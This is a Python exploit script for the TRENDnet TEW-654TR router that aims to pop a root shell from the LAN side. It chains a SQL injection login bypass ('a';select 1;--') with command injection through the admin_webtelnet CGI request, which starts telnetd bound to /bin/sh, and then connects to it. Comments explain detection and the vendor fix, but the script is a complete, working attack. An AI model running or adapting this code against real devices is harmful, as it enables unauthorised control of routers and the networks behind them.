- #!/usr/bin/env python
- # Pop a root shell on the TEW-654TR via SQL injection & command injection.
- # Currently only works from the LAN side.
- import re
- import httplib
- import urllib
- import socket
- import os
class Logging:
    """Tiny console logger that tags each message with a severity marker.

    The level constants double as indexes into ``prefixes``:
    WARN -> " [!] ", INFO -> " [+] ", DEBUG -> " [@] ".
    """
    WARN = 0
    INFO = 1
    DEBUG = 2
    # Position in this list must line up with the level constants above.
    prefixes = [" [!] ", " [+] ", " [@] "]

    @classmethod
    def log_msg(klass, msg, level=INFO):
        """Print ``msg`` to stdout, prefixed by the marker for ``level``."""
        # A single parenthesised expression prints identically whether
        # print is a statement or a function.
        print(Logging.prefixes[level] + msg)
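def test_telnet():
    """Report whether a TCP connection to 192.168.10.1 port 23 can be opened.

    Returns:
        True if the connect call completes, False if it raises a socket
        error (refused, unreachable, timed out, ...).
    """
    s = socket.socket()
    try:
        s.connect(("192.168.10.1", 23))
    except socket.error:
        return False
    finally:
        # Only the connect result matters; release the descriptor on every
        # path instead of leaving the probe connection open until exit.
        s.close()
    return True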
def check_authentication(data):
    """Classify a login response body by its <redirect_page> element.

    Scans ``data`` line by line and stops at the first line that carries
    one of the two known redirect markers.

    Returns:
        False if the "back" redirect is seen first (the line is also
        logged at DEBUG level), True if the "default" redirect is seen
        first, None if neither marker appears anywhere in ``data``.
    """
    failure_tag = '<redirect_page>back</redirect_page>'
    success_tag = '<redirect_page>default</redirect_page>'

    for line in data.splitlines():
        # Lines produced by splitlines() hold no newline, so a substring
        # test is equivalent to matching '.*TAG' from the line start.
        if failure_tag in line:
            Logging.log_msg(line, Logging.DEBUG)
            return False
        if success_tag in line:
            return True
    return None
# Script body: two POSTs to the router's web management CGI at a fixed LAN
# address, then a port check and an interactive telnet client.
#   Stage 1 - login request whose user_name field carries SQL syntax.
#   Stage 2 - admin_webtelnet request whose cmd field carries a shell command.
# Both requests go to /my_cgi.cgi; a vendor-side fix belongs in that handler
# (bind user_name as a query parameter, never hand cmd to a shell).

# Value sent as the login user name. It contains a quote, a statement
# separator and a SQL comment marker; presumably the CGI splices the field
# into a query string unescaped - confirm against the firmware.
SQL_INJECTION="a';select 1;--"
# Command sent in stage 2: starts telnetd with /bin/sh as the login program,
# so a connection to TCP/23 gets a shell without a credential prompt.
# An unexpected listener on port 23 of the device is the observable result.
TELNET_INJECTION="/usr/sbin/telnetd -l /bin/sh"
username=SQL_INJECTION
password=""
# The POST body is concatenated by hand so the parameter order is fixed.
# As written, user_name is sent raw (not URL-encoded), so the quote and
# semicolons appear literally in the request body, and user_pwd is appended
# without an '=' separator; only the (empty) password goes through quote().
params="request=login"
params+="&user_name="+username
params+="&user_pwd"+urllib.quote(password)
# Static browser-like headers. The User-Agent and Referer are fixed strings,
# so they say nothing about the real client; the request path and body
# parameters are what identify this traffic in a log.
headers= {"Host":"192.168.10.1",
          "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:8.0.1) Gecko/20100101 Firefox/8.0.1",
          "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
          "Accept-Language":"en-us,en;q=0.5",
          "Content-Type":"application/x-www-form-urlencoded",
          "Referer":"http://192.168.10.1/login.htm"}
Logging.log_msg("Attempting to authenticate using SQL injection.")
#Logging.log_msg("SQL injection string set to: "+SQL_INJECTION)
Logging.log_msg("Sending POST.")
# Plain HTTP on the default port. The numeric query string looks like a
# cache-busting random value copied from the web UI - TODO confirm.
conn=httplib.HTTPConnection("192.168.10.1")
conn.request("POST","/my_cgi.cgi?0.5219313003118983",params,headers)
response=conn.getresponse()
data=response.read()
Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
conn.close()
# check_authentication() returns True / False / None; anything other than
# True stops the script with exit status 1.
success=check_authentication(data)
if True==success:
    Logging.log_msg("Authentication successful.")
elif False==success:
    Logging.log_msg("Authentication failed. Exiting.",Logging.WARN)
    exit(1)
else:
    Logging.log_msg("Unrecognized result.",Logging.WARN)
    exit(1)
# Stage 2. No cookie or token from the login response is carried over: the
# same headers dict is reused with only Referer changed. Presumably the
# device tracks the logged-in client some other way - confirm.
Logging.log_msg("Attempting to start telnetd via command injection.")
params="request=admin_webtelnet"
params+="&cmd="+urllib.quote(TELNET_INJECTION)
conn=httplib.HTTPConnection("192.168.10.1")
headers["Referer"]="http://192.168.10.1/st_device.htm"
conn.request("POST","/my_cgi.cgi?0.19909728029442098",params,headers)
response=conn.getresponse()
Logging.log_msg("Got response: %s %s"%(str(response.status),response.reason))
# The body is read but never inspected; success is judged only by whether
# TCP/23 accepts a connection afterwards.
data=response.read()
conn.close()
if test_telnet():
    Logging.log_msg("Telnet started.")
else:
    Logging.log_msg("Telnet not started successfully.",Logging.WARN)
    exit(1)
Logging.log_msg("Starting interactive telnet session.")
# Fixed command string with no interpolated input; hands the terminal to the
# system telnet client.
os.system("telnet 192.168.10.1")